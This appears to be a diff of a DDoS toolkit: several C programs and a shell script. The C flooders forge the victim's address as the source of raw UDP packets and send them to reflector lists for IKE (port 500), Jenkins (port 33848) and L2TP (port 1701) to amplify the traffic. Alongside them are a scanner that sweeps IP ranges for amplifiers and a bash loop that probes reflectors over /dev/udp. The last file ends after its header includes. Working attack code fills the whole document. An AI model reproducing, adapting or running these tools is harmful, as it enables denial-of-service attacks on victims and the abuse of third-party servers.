||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
|
||||
/* function for header checksums */
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 16;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(500);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x6e\x32\x4e\x49\x24\xf2\xbc\xbe\x00\x00\x00\x00\x00\x00\x00\x00", 16);
|
||||
udph->len=htons(sizeof(struct udphdr) + 16);
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = sin.sin_port;
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
int i=0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
if(i==5)
|
||||
{
|
||||
usleep(0);
|
||||
i=0;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 4){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(atoi(argv[2]));
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
if(argc > 5)
|
||||
{
|
||||
sleep(atoi(argv[5]));
|
||||
} else {
|
||||
while(1){
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,200 @@
|
|||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <math.h>
|
||||
#include <ctype.h>
|
||||
#include <errno.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
static unsigned int payloadsize = 16;
|
||||
static unsigned int xport = 500;
|
||||
|
||||
volatile int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
volatile int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
char payload[] =
|
||||
"\x6e\x32\x4e\x49\x24\xf2\xbc\xbe\x00\x00\x00\x00\x00\x00\x00\x00";
|
||||
|
||||
size = sizeof(payload);
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memset(buf, 0x01, payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=size;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *recievethread()
|
||||
{
|
||||
printf("\n");
|
||||
int saddr_size, data_size, sock_raw;
|
||||
struct sockaddr_in saddr;
|
||||
struct in_addr in;
|
||||
|
||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
||||
if(sock_raw < 0)
|
||||
{
|
||||
printf("Socket Error\n");
|
||||
exit(1);
|
||||
}
|
||||
while(1)
|
||||
{
|
||||
saddr_size = sizeof saddr;
|
||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
||||
if(data_size <0 )
|
||||
{
|
||||
printf("Recvfrom error , failed to get packets\n");
|
||||
exit(1);
|
||||
}
|
||||
struct iphdr *iph = (struct iphdr*)buffer;
|
||||
if(iph->protocol == 17)
|
||||
{
|
||||
unsigned short iphdrlen = iph->ihl*4;
|
||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
||||
unsigned char* payload = buffer + iphdrlen + payloadsize;
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = data_size - iphdrlen - payloadsize;
|
||||
|
||||
if (body_length > 40)
|
||||
|
||||
{
|
||||
found_srvs++;
|
||||
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
close(sock_raw);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Shrooms Torrent Scanner\nUsage: %s <ip range start (192.0.0.0)> <ip range end (198.255.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
|
||||
pthread_t listenthread;
|
||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
||||
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
printf("Scan in Progress \n");
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Trackers Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Percent Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* priv8 priv8
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(33848);
|
||||
udph->check = 0;
|
||||
memset((void *)udph + sizeof(struct udphdr), 0x01, 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Jenkins Amplification \n Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
echo "[!] Filter started!"
|
||||
for i in $(cat list)
|
||||
do
|
||||
|
||||
echo "Scanning [$i]"
|
||||
|
||||
|
||||
exec 3<>/dev/udp/$i/33848 && python -c "print '.'" >&3 && timeout 2 cat <&3 > /tmp/scan
|
||||
|
||||
echo "$i $(wc --bytes < /tmp/scan)" >> output
|
||||
rm -rf /tmp/scan
|
||||
|
||||
done
|
||||
|
||||
echo "[!] Filter finished"
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,210 @@
|
|||
/* L2TP */
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 74;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(1701);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\xc8\x02\x00\x4c\x00\x00\x00\x00\x00\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x01\x80\x08\x00\x00\x00\x02\x01\x00\x80\x0a\x00\x00\x00\x03\x00\x00\x00\x03\x80\x0a\x00\x00\x00\x04\x00\x00\x00\x00\x80\x0c\x00\x00\x00\x07\x74\x65\x73\x74\x80\x08\x00\x00\x00\x08\x2a\x2a\x80\x08\x00\x00\x00\x0a\x00\x04", 74);
|
||||
udph->len=htons(sizeof(struct udphdr) + 74);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,305 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
|
||||
